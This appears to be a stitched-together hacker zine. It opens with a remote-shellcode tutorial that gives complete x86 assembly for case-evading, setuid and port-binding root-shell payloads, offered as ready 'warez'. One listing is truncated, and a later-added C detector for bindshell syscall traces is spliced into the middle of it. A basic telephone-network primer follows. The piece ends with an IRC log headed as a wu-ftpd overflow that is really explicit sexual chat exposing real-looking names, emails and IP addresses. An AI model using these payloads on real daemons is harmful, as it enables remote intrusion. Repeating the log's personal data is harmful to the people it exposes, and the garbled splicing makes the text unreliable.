Hopefully you are familiar with generic shell-spawning shellcode. If not, read Aleph's text "Smashing The Stack For Fun And Profit" before reading further. This article will concentrate on the types of shellcode needed to exploit daemons remotely. Generally it is much harder to exploit remote daemons, because you do not have many ways of finding out the configuration of the remote server. Often the shellcode has to be much more complicated, which is what this article will focus on.

I will start by looking at the ancient IMAP4 exploit. This is a fairly simple exploit. All you need to do is "hide" the "/bin/sh" string in the shellcode (imapd converts all lowercase characters into uppercase). None of the instructions in the generic shell-spawning shellcode contain lower-case characters, so all you need to do is change the "/bin/sh" string. It is the same as normal shellcode, except there is a loop which adds 0x20 to each byte in the "/bin/sh" string. I put in lots of comments so even beginners can understand it.
Sorry to all those asm virtuosos :]

-----imap.S-------
.globl main
main:
    jmp call
start:
    popl %ebx           /* get address of /bin/sh */
    movl %ebx,%ecx      /* copy the address to ecx */
    addb $0x6,%cl       /* ecx now points to the last character */
loop:
    cmpl %ebx,%ecx
    jl skip             /* if (ecx

Most syscalls in linux x86 are done in the same way. The syscall number is put into register %eax, and the arguments are put into %ebx, %ecx and %edx respectively. In some cases, where there are more arguments than registers, it may be necessary to store the arguments in user memory and store the address of the arguments in the register. Or, if an argument is a string, you would have to store the string in user memory and pass the address of the string as the argument. As before, the syscall is called by "int $0x80". You can potentially use any syscall, but the ones mentioned above should just about be the only ones you will ever need. As an example, here's a little shellcode snippet from my wu-ftpd exploit that should execute setuid(0). Note: you should always zero a register before using it.

---setuid.S----
.globl main
main:
    xorl %ebx,%ebx      /* zero the %ebx register, i.e. the 1st argument */
    movl %ebx,%eax      /* zero out the %eax register */
    movb $0x17,%al      /* set the syscall number */
    int $0x80           /* call the interrupt handler */
---------------

Port-Binding Shellcode

When you are exploiting a daemon remotely with generic shellcode, it is necessary to have an active TCP connection to pipe the shell stdin/out/err over. This is applicable to all the remote linux exploits I've seen so far, and is the preferred method. But it is possible that a new vulnerability may be found in a daemon that only offers a UDP service (SNMP for example). Or it may only be possible to access the daemon via UDP because the TCP ports are firewalled etc. Current linux remote vulnerabilities are exploitable via UDP - BIND as well as all rpc services run both UDP and TCP services.
Also, if you send the exploit via UDP it is trivial to spoof the attacking udp packet so that you do not appear in any logs =) To exploit daemons via UDP you could write shellcode to modify the password file or to perform some other cunning task, but an interactive shell is much more elite =]

Clearly it is not possible to fit a UDP pipe into shellcode, you still need a TCP connection. So my idea was to write shellcode that behaved like a very rudimentary backdoor, it binds to a port and executes a shell when it receives a connection. I know for a fact that I wasn't the first one to write this type of shellcode, but no one has officially published it so...here goes.

A basic bindshell program (without the style) looks like this:

int main()
{
  char *name[2];
  int fd,fd2,fromlen;
  struct sockaddr_in serv;

  fd=socket(AF_INET,SOCK_STREAM,0);
  serv.sin_addr.s_addr=0;
  serv.sin_port=1234;
  serv.sin_family=AF_INET;
  bind(fd,(struct sockaddr *)&serv,16);
  listen(fd,1);
  fromlen=16; /*(sizeof(struct sockaddr)*/
  fd2=accept(fd,(struct sockaddr *)&serv,&fromlen);
  /* "connect" fd2 to stdin,stdout,stderr */
  dup2(fd2,0);
  dup2(fd2,1);
  dup2(fd2,2);
  name[0]="/bin/sh";
  name[1]=NULL;
  execve(name[0],name,NULL);
}

Obviously, this is going to require a lot more space than normal shellcode, but it can be done in under 200 bytes and most buffers are quite a bit larger than that.

There is a slight complication in writing this shellcode as socket syscalls are done slightly differently than other syscalls, under linux. Every socket call has the same syscall number, 0x66. To differentiate between different socket calls, a subcode is put into the register %ebx. These can be found in . The important ones being:

SYS_SOCKET 1
SYS_BIND   2
SYS_LISTEN 4
SYS_ACCEPT 5

We also need to know the values of the constants, and the exact structure of sockaddr_in. Again these are in the linux include files.
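The call order of the bindshell program above (0x66 with subcodes 1, 2, 4 and 5, then dup2() onto 0, 1 and 2, then execve()) is also what a monitor sees in a syscall trace of the exploited daemon. As an added example that is not part of the original article, this C code flags that order in a list of traced i386 syscalls; the sc_event record, its arg0 field, find_bindshell() and both sample traces are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* i386 syscall numbers; 0x66, 0x3f and 0x0b are the ones the article uses. */
enum { NR_CLOSE = 0x06, NR_EXECVE = 0x0b, NR_DUP2 = 0x3f, NR_SOCKETCALL = 0x66 };
/* socketcall() subcodes carried in %ebx, as listed in the article. */
enum { SYS_SOCKET = 1, SYS_BIND = 2, SYS_LISTEN = 4, SYS_ACCEPT = 5 };

/* Hypothetical trace record: one completed syscall of one process. */
struct sc_event {
    uint32_t eax;   /* syscall number */
    uint32_t ebx;   /* socketcall: subcode; dup2: oldfd; close: fd */
    uint32_t ecx;   /* dup2: newfd (socketcall: pointer to the arguments) */
    int32_t  arg0;  /* socketcall: first word at *ecx, read by the tracer */
    int32_t  ret;   /* value returned in %eax */
};

#define MAX_FD 256
enum fd_state { FD_OTHER = 0, FD_SOCKET, FD_BOUND, FD_LISTENING, FD_CONN };

static int valid_fd(int64_t fd) { return fd >= 0 && fd < MAX_FD; }

/* Returns the index of the first execve() issued while descriptors 0, 1 and 2
 * all refer to a connection accepted by this same process, or -1 if none. */
int find_bindshell(const struct sc_event *ev, size_t n)
{
    enum fd_state fds[MAX_FD] = { FD_OTHER };
    size_t i;

    for (i = 0; i < n; i++) {
        const struct sc_event *e = &ev[i];

        if (e->ret < 0)
            continue;                       /* failed calls change nothing */
        if (e->eax == NR_SOCKETCALL && e->ebx == SYS_SOCKET) {
            if (valid_fd(e->ret))
                fds[e->ret] = FD_SOCKET;
        } else if (e->eax == NR_SOCKETCALL && valid_fd(e->arg0)) {
            enum fd_state *s = &fds[e->arg0];
            if (e->ebx == SYS_BIND && *s == FD_SOCKET)
                *s = FD_BOUND;
            else if (e->ebx == SYS_LISTEN && (*s == FD_SOCKET || *s == FD_BOUND))
                *s = FD_LISTENING;
            else if (e->ebx == SYS_ACCEPT && *s == FD_LISTENING && valid_fd(e->ret))
                fds[e->ret] = FD_CONN;
        } else if (e->eax == NR_DUP2) {
            if (valid_fd(e->ebx) && valid_fd(e->ecx))
                fds[e->ecx] = fds[e->ebx];  /* newfd now names the same object */
        } else if (e->eax == NR_CLOSE) {
            if (valid_fd(e->ebx))
                fds[e->ebx] = FD_OTHER;
        } else if (e->eax == NR_EXECVE) {
            if (fds[0] == FD_CONN && fds[1] == FD_CONN && fds[2] == FD_CONN)
                return (int)i;
        }
    }
    return -1;
}

/* Constructed trace: the call order of the article's bindshell program. */
static const struct sc_event bindshell_trace[] = {
    { NR_SOCKETCALL, SYS_SOCKET, 0, 2, 3 },     /* socket(2,1,0) = 3 */
    { NR_SOCKETCALL, SYS_BIND,   0, 3, 0 },
    { NR_SOCKETCALL, SYS_LISTEN, 0, 3, 0 },
    { NR_SOCKETCALL, SYS_ACCEPT, 0, 3, 4 },     /* accept(3,...) = 4 */
    { NR_DUP2, 4, 0, 0, 0 },
    { NR_DUP2, 4, 1, 0, 1 },
    { NR_DUP2, 4, 2, 0, 2 },
    { NR_EXECVE, 0, 0, 0, 0 },
};

/* Constructed trace: a server that accepts a client, then points stdout and
 * stderr at a log file (fd 5) before exec'ing a helper program. */
static const struct sc_event benign_trace[] = {
    { NR_SOCKETCALL, SYS_SOCKET, 0, 2, 3 },
    { NR_SOCKETCALL, SYS_BIND,   0, 3, 0 },
    { NR_SOCKETCALL, SYS_LISTEN, 0, 3, 0 },
    { NR_SOCKETCALL, SYS_ACCEPT, 0, 3, 4 },
    { NR_DUP2, 5, 1, 0, 1 },
    { NR_DUP2, 5, 2, 0, 2 },
    { NR_EXECVE, 0, 0, 0, 0 },
};

int main(void)
{
    printf("bindshell trace: execve flagged at event %d\n",
           find_bindshell(bindshell_trace, 8));
    printf("benign trace:    %d\n", find_bindshell(benign_trace, 7));
    return 0;
}
```

inetd-style superservers produce the same order on purpose, so the match is only meaningful for daemons that are not expected to hand a client socket to a new program.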
AF_INET == 2
SOCK_STREAM == 1

struct sockaddr_in {
  short int sin_family;         /* 2 byte word, containing AF_INET */
  unsigned short int sin_port;  /* 2 byte word, containing the port in network byte order */
  struct in_addr sin_addr;      /* 4 byte long, should be zeroed */
  unsigned char pad[8];         /* should be zero, but doesn't really matter */
};

Since there are only two registers left, the arguments must be placed sequentially in user memory, and %ecx must contain the address of the first. Hence we have to store the arguments at the end of the shellcode. The first 12 bytes will contain the 3 long arguments, the next 16 will contain the sockaddr_in structure and the final 4 will contain fromlen for the accept() call. Finally the result from each syscall is held in %eax.

So, without further ado, here is the portshell warez... Again I've over-commented everything.

----portshell.S----
.globl main
main:
    /* I had to put in a "bounce" in the middle of the code as the shellcode
     * was too big. If I had made it jmp the entire shellcode, the instruction
     * would have contained a null byte, so if anyone has a shorter version,
     * please send me it.
     */
    jmp bounce
start:
    popl %esi

    /* socket(2,1,0) */
    xorl %eax,%eax
    movl %eax,0x8(%esi)     /* 3rd arg == 0 */
    movl %eax,0xc(%esi)     /* zero out sock.sin_family&sock.sin_port */
    movl %eax,0x10(%esi)    /* zero out sock.sin_addr */
    incb %al
    movl %eax,%ebx          /* socket() subcode == 1 */
    movl %eax,0x4(%esi)     /* 2nd arg == 1 */
    incb %al
    movl %eax,(%esi)        /* 1st arg == 2 */
    movw %eax,0xc(%esi)     /* sock.sin_family == 2 */
    leal (%esi),%ecx        /* load the address of the arguments into %ecx */
    movb $0x66,%al          /* set socket syscall number */
    int $0x80

    /* bind(fd,&sock,0x10) */
    incb %bl                /* bind() subcode == 2 */
    movb %al,(%esi)         /* 1st arg == fd (result from socket()) */
    movl %ecx,0x4(%esi)     /* copy address of arguments into 2nd arg */
    addb $0xc,0x4(%esi)     /* increase it by 12 bytes to point to sockaddr struct */
    movb $0x10,0x8(%esi)    /* 3rd arg == 0x10 */
    movb $0x23,0xe(%esi)    /* set sin.port */
    movb $0x66,%al          /* no need to set %ecx, it is already set */
    int $0x80

    /* listen(fd,2) */
    movl %ebx,0x4(%esi)     /* bind() subcode==2, move this to the 2nd arg */
    incb %bl                /* no need to set 1st arg, it is the same as bind() */
    incb %bl                /* listen() subcode == 4 */
    movb $0x66,%al          /* again, %ecx is already set */
    int $0x80

    /* fd2=accept(fd,&sock,&fromlen) */
    incb %bl                /* accept() subcode == 5 */
    movl %ecx,0x4(%esi)     /* copy address of arguments into 2nd arg */
    addb $0xc,0x4(%esi)     /* increase it by 12 bytes */
    movl %ecx,0x4(%esi)     /* copy address of arguments into 3rd arg */
    addb $0x1c,0x4(%esi)    /* increase it by 12+16 bytes */
    movb $0x66,%al
    int $0x80

    /* KLUDGE */
    jmp skippy
bounce:
    jmp call
skippy:

    /* dup2(fd2,0) dup2(fd2,1) dup2(fd2,2) */
    movb %al,%bl            /* move fd2 to 1st arg */
    xorl %ecx,%ecx          /* 2nd arg is 0 */
    movb $0x3f,%al          /* set dup2() syscall number */
    int $0x80
    incb %cl                /* 2nd arg is 1 */
    movb $0x3f,%al
    int $0x80
    incb %cl                /* 2nd arg is 2 */
    movb $0x3f,%al
    int $0x80

    /* execve("/bin/sh",["/bin/sh"],NULL) */
    movl %esi,%ebx
    addb $0x20,%ebx         /* %ebx now points to "/bin/sh" */
    xorl %eax,%eax
    movl %ebx,0x8(%ebx)
    movb %al,0x7(%ebx)
    movl %eax,0xc(%ebx)
    movb $0xb,%al
    leal 0x8(%ebx),%ecx
    leal 0xc(%ebx),%edx
    int $0x80

    /* exit(0) */
    xorl %eax,%eax
    movl %eax,%ebx
    incb %al
    int $0x80
call:
    call start
    .ascii "abcdabcdabcd""abcdefghabcdefgh""abcd""/bin/sh"
-----------------------------------------------------

Once you have sent the exploit, you only need to connect to port 8960, and you have an interactive shell.

----------------[ FreeBSD shellcode

Just in case all of that was all old hat to you, I'll take a little foray into the world of BSD x86 shellcode. FreeBSD shellcode is in most ways completely different, primarily because syscalls are done by pushing arguments onto the stack and using a far call. The syscall number still goes in the %eax register however. OpenBSD is much the same but it uses an interrupt for syscalls.

The main complication in writing shellcode for FreeBSD is in the far call (instruction lcall 7,0) which contains 5 null bytes. Obviously you would need to write some basic self-modifying shellcode. Since this is going to be used in every syscall you make, it's best to put this into a mini-function and call it whenever necessary. I wrote a little template for this, it's easy enough to make it execute a shell or bind to a port. Just in case you're wondering, the syscall for execve is 0x3b.

----fbsd.S----
.globl main
main:
    jmp call
start:
    /* Modify the ascii string so it becomes lcall 7,0 */
    popl %esi
    xorl %ebx,%ebx
    movl %ebx,0x1(%esi)     /* zeroed long word */
    movb %bl,0x6(%esi)      /* zeroed byte */
    movl %esi,%ebx
    addb $0x8,%bl           /* ebx points to binsh */
    jmp blah                /* start the code */
call:
    call start
syscall:
    .ascii "\x9a\x01\x01\x01\x01\x07\x01"   /* hidden lcall 7,0 */
    ret
binsh:
    .ascii "/bin/sh...."
blah:
    /* put shellcode here */
    call syscall

================================================================================
[The Telephone System/network part 1]
================================================================================
By - Pabell

THE TELEPHONE SYSTEM OR NETWORK

This paper was written mainly because of the lack of real information kicking around on and off the net about phone systems and networks. This is part one of a two-part primer on phone systems. This is a very introductory paper. I don't go into great detail, but cover the basics and take a first look at phone networks and systems. If you really haven't been exposed to the telephony industry, this paper may be ominous.

For the purpose of this paper I have broken the telephone network into three basic components.

1. THE CENTRAL SWITCHING MACHINE
2. THE OUTSIDE PLANT FACILITIES
3. THE INSIDE PLANT FACILITIES

In this paper we will look at each of the three sections. Section three, the INSIDE PLANT FACILITIES, will be covered in detail throughout it. The CENTRAL SWITCHING MACHINE and the OUTSIDE PLANT FACILITIES sections of the telephone network will be explained briefly in general terms.

Most of the parts of the telephone system or network will already be familiar to you, even without realizing it. You have a phone of some description in your home or office, which is part of the INSIDE PLANT FACILITIES section of the telephone network. The INSIDE PLANT FACILITIES consist of all the cable, hardware, telephone sets or equipment in the building or between buildings on the same piece of property. The part of the network which connects buildings of various shapes and descriptions together is called THE OUTSIDE PLANT FACILITIES. Poles and associated wires are the only type of outside plant distribution system in use today. The remaining part you may not know about, or at least think you don't know about, is the Central Switching Machine.
The basic telephone circuit is a Two Wire Circuit, which connects every telephone set, through the Outside Plant Facilities, to a Central Switch. This two-wire circuit is usually referred to as a "pair". One wire of the pair is referred to as the TIP and the other wire is the RING.

THE CENTRAL SWITCHING MACHINE

The CENTRAL SWITCHING MACHINE is similar to the hub of a wheel where all the individual two-wire circuits, or spokes, are connected. This may sound pretty complicated, but it really isn't. The central switch monitors your telephone circuit and gives you a dial tone when you lift the telephone set off the cradle. Taking a telephone handset off the cradle is referred to as going "off-hook". Off-hook is a very common phrase, and you will hear it in later parts of this paper.

When you dial, the Central Switch registers the digits dialed, and identifies the circuit of the party you are trying to reach. The Central Switch then connects your two-wire circuit to the party you dialed. The two telephone sets which are connected together by the Central Switch are referred to as the "calling" and "called" parties. The Central Switch then sends a ringing voltage out to the called party, which rings the set bells to identify an incoming call. When the called party goes off-hook, the Central Switch recognizes the off-hook condition and stops sending the ringing voltage; the two parties then converse. When the calling party dials the number of a telephone circuit which is already in use, or "busy", the Central Switch recognizes the busy condition, and returns a busy tone to the calling party.

So, as you can see, the Central Switch isn't really unfamiliar to you. You have interacted with, and experienced, many of the operations it performs. There are many types of Central Switching Machines in use throughout the telephone industry today. Each switch has its advantages and features; however, all systems provide the basic functions which were briefly described.
To review, the main parts of the Telephone Network I have described so far are:

1. THE CENTRAL SWITCHING MACHINE
2. THE OUTSIDE PLANT FACILITIES
3. THE INSIDE PLANT FACILITIES

Let's backtrack briefly to the Outside Plant Facilities section of the network. Obviously, it would be too difficult to take each separate two-wire circuit individually back to the Central Switch. Consequently, numerous two-wire circuits or pairs from a common area are bound together in a common covering, or sheath. These groups of pairs enclosed by a common sheath are referred to as cable. The actual number of pairs in a cable, or the size of the cable, can vary from one pair to hundreds of pairs, dependent upon how many circuits the cable must service.

As was mentioned previously, all the cables servicing locations leave the Central Switch in different directions according to the route which will be the most cost effective and can effectively service people in the area. The cables which leave the Central Switch are very large, but as the cable goes along it is continually decreasing in size, as smaller cables are dropped off at locations where they are needed. The smaller cables branch out from the main cables, and these cables again branch out to smaller cables until every building and place is reached.

There are three basic types of outside plant facilities in use today, which connect the Central Switch, ultimately, to your phone.

1. AERIAL CABLE
2. UNDERGROUND CABLE
3. FIBER OPTIC CABLE

Let's briefly look at each of the types of Outside Plant Facilities.

Aerial Cable

As the name aerial cable would indicate, the cable and terminals are supported above the ground on poles. The Aerial Cable distribution system is probably the one you are most familiar with, since it was the first system utilized across North America.
The poles and wire are still visible throughout this country today, and in many cases are still the most cost-effective method where underground cabling is physically impossible. The diagram would be typical of a single line residential building application of an Aerial Outside Plant System. You may see the term "terminal" in the diagram. Terminals are simply access points placed at convenient locations, on or between poles, along the cable route to permit connections to selected pairs in the cable. For example, a cable consisting of 100 pairs might have a terminal mounted on the pole to allow a technician access to pairs 1-25. The next terminal would allow access to pairs 24-40, and so on, until all the pairs have been used. In this manner, the pair assigned to each building, at the Central Switch, can be accessed at the closest terminal to that particular building. The individual building's aerial "drop wire" is then connected to the pair in that terminal.

Underground Cable

The underground cable distribution system is very similar in design to the aerial cable system. I consider underground cable to be both DIRECT BURIED CABLE and CABLE PLACED IN UNDERGROUND CONDUIT SYSTEMS. As the title Direct Buried would indicate, the cable is placed into the ground, with no protection other than the inherent protection provided by the cable composition. Underground Conduit Systems for cable are used to provide an out of sight cable system and to provide a means of adding to the existing cable as service demands increase. Underground Conduit Systems also provide protection for the cables, since the cables are inside a pipe which shields the cable.

The Underground Cable Distribution System is configured similarly to the aerial cable, in that cables leave a central point and continually branch out to smaller cables until all the buildings etc. have been accommodated. The Underground System is connected to buildings in basically two ways: PEDESTALS and ENCAPSULATION.
Pedestals are simply terminals or access points where building cabling can be connected to the cable from the Central Switching Machine. There are many types, sizes, and shapes of pedestals in use today. The following diagram is a simplified depiction of the underground cable (drop wire) from a building premise, which has been buried, to a pedestal for connection.

Encapsulation is when the building's drop wire is permanently spliced into the underground distribution system. This system is preferred in situations where visible pedestals are not appropriate, or possible.

Fiber Optic Transmission Systems

In the aerial and underground cable distribution systems looked at earlier, a pair of copper wires is used to carry the electrical signals generated by the transmitting building's phone to the switching machine, and then ultimately to the receiver's phone. The mouthpiece (transmitter) of the telephone converts the acoustic voice message into corresponding electrical signals. The electrical signals are passed on to the receiver's earpiece (receiver), where they are converted back to the original acoustic voice message.

In certain cases now, it is becoming uneconomical to provide a pair of wires from every customer phone to the central switch. Transmitting speech and information via glass fibers, instead of the conventional copper wire methods previously described, is becoming increasingly popular in high traffic areas. The term "Fiber Optics" or "FOTS" is becoming more and more prevalent in the communication industry. "FOTS" is the short term for Fiber Optics Transmission System. The development of FOTS technology has been increasing dramatically in recent years.

The transmitting building's phone still generates the same electrical signals, but the signals are used to turn a light source on and off. The light travels down the glass fibers, where it is received and converted back to electrical impulses, which are connected to the receiving customer's two-wire copper pair.
To get a perspective of the comparison of a pair of copper wires to a pair of glass fibers, consider the number of independent connections, which are possible on each type of system. * A pair of copper wires will provide two way communications for one conversation. * A pair of glass fibers can provide up to 8000 independent connections. The demands for more and more facilities to transmit and receive information is increasingly rapid. The cost and limitations of traditional means of linking areas together, is becoming more apparent. The normal cable distribution systems in use throughout the telephone industry employs combinations of underground, aerial, and FOTS distribution systems, to provide the most cost efficient, and effective means of providing service. There is your basic introduction to the telephone network or system. As my series of phone networks goes on I will go into greater detail and explain some of its more complex issues and attributes. Pabell pabell@comtech.ab.ca ------------------------------------------------------------------------------------------- el8 wu-ftpd overflow, by cossack and smiler ok back chrak he loves the simpsons too :\ [msg(asphxia)] im loaded HEH ill send u a 54 bill [msg(rachel_)] HEH for 5$ she will cybersex me [msg(rachel_)] im gonna log it so youre more like him than u thought :\ [msg(rachel_)] and [msg(rachel_)] let gummo see it HEH!! [rachel_(nobans@166-87-97.ipt.aol.com)] haha ummo wont believe u [rachel_(nobans@166-87-97.ipt.aol.com)] er gummo [msg(rachel_)] HEH [msg(asphxia)] HEH ok today!?!?!! [msg(asphxia)] HEH ??!?!!? [msg(asphxia)] HEH u better not turn out to be a man HGHEH! ùíù tip [tip@209.107.78.20] has joined #falon yo yo yo yo yo i'm gonna... DANCE ùíù tip [tip@209.107.78.20] has left #falon [] [msg(tip)] HEH im trying to get phone/cyber sex from phixes girlfriend HEH!!! [asphxia(bg0124a@216.76.138.90)] i am not a man [msg(tip)] she said if i mail her money she will so HEH. 
[msg(asphxia)] HEH ok [tip(tip@209.107.78.20)] HUH? ð asphxia lays down naked on your bed [msg(tip)] HEH shut up im getting laid ùíù Starting conversation with asphxia [tip(tip@209.107.78.20)] werd [msg(asphxia)] heh ok [msg(asphxia)] HEH hurry up im whacking off to pt0n HEH!! ð asphxia starts to play with her clirt [msg(asphxia)] pr0n! [asphxia(bg0124a@216.76.138.90)] -r [msg(asphxia)] HEH huh ? [msg(asphxia)] well [msg(asphxia)] lets hurry p im leavin in 40 minutes HEh and i wnna talk to someone on irc after u HEH! [asphxia(bg0124a@216.76.138.90)] ok [asphxia(bg0124a@216.76.138.90)] ok ð asphxia starts to rub her clit harder [msg(asphxia)] oHEH r u like fingering urself or some shit HEH ? ð asphxia sucks on the head of your dick ð asphxia puts her fingers in to her wet pussy [msg(asphxia)] HEH ur not seriously doing that r u HEH ? [msg(asphxia)] HEH ok [msg(asphxia)] keep tyalking!! HEH ð -> chrak/asphxia HEH me starts liek uNFIng u HH! [msg(asphxia)] HEH!@!! ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | asphxia (bg0124a@216.76.138.90) (unknown) ³ ircname : bree | channels : #atlantaga ³ server : irc.emory.edu ([170.140.4.6] Emory University) [msg(asphxia)] HEH helloo HEH !! [msg(asphxia)] u cant just start and stop HEH!! [msg(asphxia)] it sux like that!!! [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak ][sean@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] [#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a] [#falon ][@rachel_ ][nobans@166-87-97.ipt.aol.com ] [n/a] [msg(rachel)] HEH omg [msg(rachel_)] HEH omg [msg(rachel_)] she stopped cybering me for no reason HEH!! [msg(rachel_)] HEH [msg(rachel_)] unless she is really doing the shit she is saying shes doing HEH! 
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | chrak (sean@cpwright.com) (Internic Commercial) ³ ircname : Sean Harny | channels : #b4b0 #dr00gz @#falon ³ server : irc.cs.cmu.edu (calloc(1,sizeof(geek))) : idle : 0 hours 0 mins 39 secs (signon: Tue Feb 23 14:35:33 1999) [ctcp(asphxia)] PING ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | asphxia (bg0124a@216.76.138.90) (unknown) ³ ircname : bree | channels : #atlantaga ³ server : irc.emory.edu ([170.140.4.6] Emory University) ùíù [#h] Bad channel key ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | asphxia (bg0124a@216.76.138.90) (unknown) ³ ircname : bree | channels : #atlantaga ³ server : irc.emory.edu ([170.140.4.6] Emory University) [ctcp(asphxia)] PING HEh her server is like dying or some shit HEH [ctcp(asphxia)] PING [ctcp(asphxia)] PING [ctcp(#falon)] PING ùíù Ignorance List: [ 1] #b4b0: ALL ùíù chrak [sean@cpwright.com] has joined #phrack ùíù Topic for #phrack: shoe. ùíù topic set by apropos [Tue Feb 23 01:04:13 1999] ùíù [Users(#phrack:65)] [ chrak ] [ fail ] [@hmf ] [ simpleton ] [ RedRasta ] [@loadammo ] [ b0n3r ] [ gweeds ] [ fungus ] [ awr ] [ [JFK] ] [ batz ] [ tyme ] [ ecx ] [ emoz ] [ _jcd ] [@eb_ ] [@vis10n ] [ kaotik ] [ g00ey ] [ F0uRier ] [ fiji ] [@angstrom ] [ Victoria ] [@sw1tchg0d ] [ infecti0n ] [ spinux ] [ zach ] [@d-low ] [ cripto ] [ interline ] [ dreck_ ] [@soyl3nt ] [@miph ] [@par ] [@plaguez ] [@halflife ] [ yewdeepee ] [ shift4 ] [@ARP_H ] [@b_ ] [ Kludge ] [@fah_ ] [@cain ] [ apathy ] [@lanfear ] [ hi_ ] [ Neural_ ] [ thwack ] [ i87 ] [@route ] [@apropos ] [@soylent ] [@bovine ] [@p-wInd0Wz ] [@kamee ] [ neurostim ] [ krnl ] [ kweiheri ] [ meenk ] [@ikol ] [@syke ] [ enr1que ] [@nihilis ] [ theclerk ] ùíù [Users(#phrack:13)] [@sirsyko ] [ falken ] [@rogerb ] [ snowman ] [ fx ] [@felix ] [ nocarrier ] [ chris ] [@FrontLine ] [ gaius_ ] [@kiad ] [@tmcm ] [@silitek ] ùíù Channel #phrack was created at Sat Jul 18 08:25:57 1998 ùíù BitchX: Join to #phrack was synced in 0.292 
secs!! ùíù chrak [sean@cpwright.com] has left #phrack [] ùíù chrak [sean@cpwright.com] has joined #chat ùíù Topic for #chat: le porc frangais indique que vous joindrez mes ligions ùíù topic set by Chewbacca [Tue Feb 23 15:19:08 1999] ùíù [Users(#chat:28)] [ chrak ] [ zahr ] [ skibum1 ] [ RuFfrYdEr ] [ Luvman ] [ billisray ] [ iibmoz ] [ FireLord ] [ uberpig ] [@PartyDr ] [@ssmile ] [ Poisoned ] [ kasper ] [ Cochise ] [@Wildcard ] [ Sigma2000 ] [@Gobo ] [@Porthos ] [ Zooj ] [@Fedaykin ] [@Chewbacca ] [ `cat ] [ Hrunting ] [@shinsei ] [@Babylon ] [@Athos ] [@Aramis ] [@Lao-Tzu ] ùíù Channel #chat was created at Wed Feb 3 12:44:48 1999 ùíù BitchX: Join to #chat was synced in 0.176 secs!! [msg(asphxia)] HEH ùíù chrak [sean@cpwright.com] has left #chat [] ùíù Ignorance List: [ 1] #b4b0: ALL ùíù Connecting to port 6667 of server irc.prison.net [refnum 12] !irc.prison.net Looking up your hostname... !irc.prison.net Checking Ident !irc.prison.net Got Ident response !irc.prison.net Found your hostname ùíù Your nick [chrak] is owned by sean@cpwright.com ùíù BitchX: For more information about BitchX type /about ùíù Welcome to the Internet Relay Network chrak_ ùíù Your host is irc.Prison.NET[irc], running version 2.8.21+RF+CSr30 ùíù This server was created Mon Nov 23 1998 at 10 29:13 PST ùíù irc.Prison.NET 2.8.21+RF+CSr30 oiwsfcukbdl biklmnopstv ùíù [local users on irc(796)] 2% ùíù [global users on irc(5575)] 12% ùíù [invisible users on irc(40720)] 88% ùíù [ircops on irc(187)] 0% ùíù [total users on irc(46295)] ùíù [unknown connections(0)] ùíù [total servers on irc(45)] (avg. 1028 users per server) ùíù [total channels created(19156)] (avg. 2 users per channel) ùíù [Highest client connection count(1452) (1451)] ùíù Mode change [+iw] for user chrak_ ùíù Topic for #b4b0: r4lph has quit b4b0. I've massd'd the place to commemorate his fine service. 
ùíù topic set by Stoner [Mon Feb 22 17:49:36 1999] ùíù [Users(#b4b0:23)] [ chrak_ ] [ raychel- ] [ Oroku ] [ MostHateD ] [ rachel_ ] [ chrak ] [ Deads0u| ] [ m0f0 ] [ F0uRier ] [ ne0h ] [ pahrohfit ] [ e- ] [ espionage ] [vz0rt ] [ zayten ] [ bluetip ] [vb4b0 ] [ gb ] [ malloc- ] [ liquidhex ] [ sadjester ] [ gob ] [ tip ] ùíù chrak_ [~hmm@cpwright.com] has joined #dr00gz ùíù [Users(#dr00gz:5)] [ chrak_ ] [ chrak ] [@PHiNG ] [ liquidhex ] [@irrupt ] ùíù chrak_ [~hmm@cpwright.com] has joined #falon ùíù [Users(#falon:6)] [ chrak_ ] [ raychel- ] [@rachel_ ] [@chrak ] [@Falon ] [@liquidhex ] ùíù Channel #b4b0 was created at Mon Jan 25 17:26:24 1999 ùíù BitchX: Join to #b4b0 was synced in 9.500 secs!! ùíù Channel #dr00gz was created at Sun Feb 21 19:35:58 1999 ùíù BitchX: Join to #dr00gz was synced in 15.124 secs!! ùíù Channel #falon was created at Tue Feb 23 07:24:25 1999 [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak ][sean@cpwright.com ] [n/a] [#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] [#falon ][@rachel_ ][nobans@166-87-97.ipt.aol.com ] [n/a] [#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a] ùíù BitchX: Join to #falon was synced in 21.486 secs!! 
